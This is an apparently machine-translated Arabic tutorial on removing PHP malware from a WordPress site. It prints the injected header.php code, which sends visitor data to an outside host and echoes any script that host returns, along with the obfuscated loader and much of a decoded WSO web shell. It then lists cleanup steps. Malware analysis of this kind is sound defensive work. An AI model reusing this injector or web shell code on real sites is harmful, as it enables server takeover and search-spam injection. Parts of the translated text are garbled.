يقدم هذا البرنامج التعليمي حالة معينة كانت فيها مدونة WordPress فيروسًا. إزالة فيروس WordPress PHP.
محتوى
في الأيام الأخيرة ، لاحظت رمزًا مشبوهًا يبدو أنه فيروس PHP لـ WordPress. كان رمز PHP التالي موجود في header.php، قبل الخط </head>.
<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>هذا رمز PHP ، كما هو موضح ، يحاول استرداد محتوى المورد على خادم خارجي ، ولكن الجزء الذي يشير إلى عنوان URL غير مكتمل.
آلية التشغيل أكثر تعقيدًا قليلاً وتجعل فيروس WordPress PHP غير مرئي لزوار المواقع المتأثرة. بدلاً من ذلك ، فإنه يستهدف محركات البحث (Google) ويؤدي ضمنيًا إلى انخفاض كبير في عدد الزوار على مواقع الويب المتأثرة.
البرامج الضارة WordPress تفاصيل البرامج الضارة PHP
1. الكود أعلاه موجود في header.php.
2. ظهر ملف على الخادم wp-log.php في المجلد wp-includes.
3. wp-log.php يحتوي على رمز مشفر ، ولكن من السهل نسبيا فك تشفير.
<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>رمز برامج الخبيثة wp-log.php :
<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("
<pre align=center-->
<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>يبدو أنه برنامج نصي لـ PHP Malware يحتوي على رمز لإدارة المصادقة والإجراءات على الملفات والدلائل على الخادم. يمكن أن نرى بسهولة أن هذا البرنامج النصي يحتوي على متغيرات مثل $auth_pass (كلمة مرور المصادقة) ، $default_action (الإجراء الافتراضي) ، $default_use_ajax (الاستخدام الافتراضي لـ Ajax) و $default_charset (إعداد الأحرف الافتراضي).
من الواضح أن هذا البرنامج النصي يحتوي على قسم يتحقق من وكلاء مستخدم HTTP لمنع الوصول إلى بعض روبوتات الويب ، مثل محركات البحث. يحتوي أيضًا على قسم يتحقق من وضع أمان PHP ويضع بعض مديري العمل.
4. إذا تم الوصول إلى wp-log.php في المتصفح ، تظهر صفحة ويب مع حقل من المصادقة. للوهلة الأولى ، يبدو أنه مدير ملفات يمكن من خلاله تسلق الملفات الجديدة بسهولة على الخادم المستهدف.
Cum Devirusezi un wordpress؟
دائمًا ، تنطوي عملية الاضطراب اليدوي على اكتشاف وفهم أولاً ، ما هو الضعف.
1. يولد نسخة احتياطية للموقع بأكمله. يجب أن تتضمن كل من الملفات وقاعدة البيانات.
2. حدد ما يقرب من الوقت الذي ظهر فيه الفيروس وبحث على خادم الويب الملفات المعدلة أو الجديدة التي تم إنشاؤها في الوقت التقريبي.
على سبيل المثال ، إذا كنت تريد رؤية الملفات .php تم إنشاؤه أو تعديله في الأسبوع الماضي ، وقم بتنفيذ الأمر في الخادم:
find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"إنها طريقة بسيطة يمكنك من خلالها خصم ملفات WordPress وتلك التي تحتوي على البرامج الضارة.
3. تحقق من الملف .htaccess من التوجيهات المشبوهة. إذن السيناريو أو خطوط التنفيذ.
4. تحقق من قاعدة البيانات. من المحتمل جدًا أن يتم تحرير بعض منشورات ووردبريس بالبرامج الضارة أو إضافة جديدة المستخدمين الذين لديهم دور المسؤول.
5. تحقق من تصاريح الكتابة للمجلدات والملفات. chmod و chown.
الأذونات الموصى بها هي: 644 للملفات و 755 للمديرين.
find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;6. تحديث الكل WordPress Plugins / WordPress Themes.
متعلق ب: إصلاح إعادة توجيه WordPress Hack 2023 (إعادة توجيه الفيروس)
هذه طرق “أساسي” يمكنك من خلالها رفض مدونة موقع ويب / وورد. إذا كانت لديك مشاكل وتحتاج إلى مساعدة ، فإن مربع التعليق مفتوح.
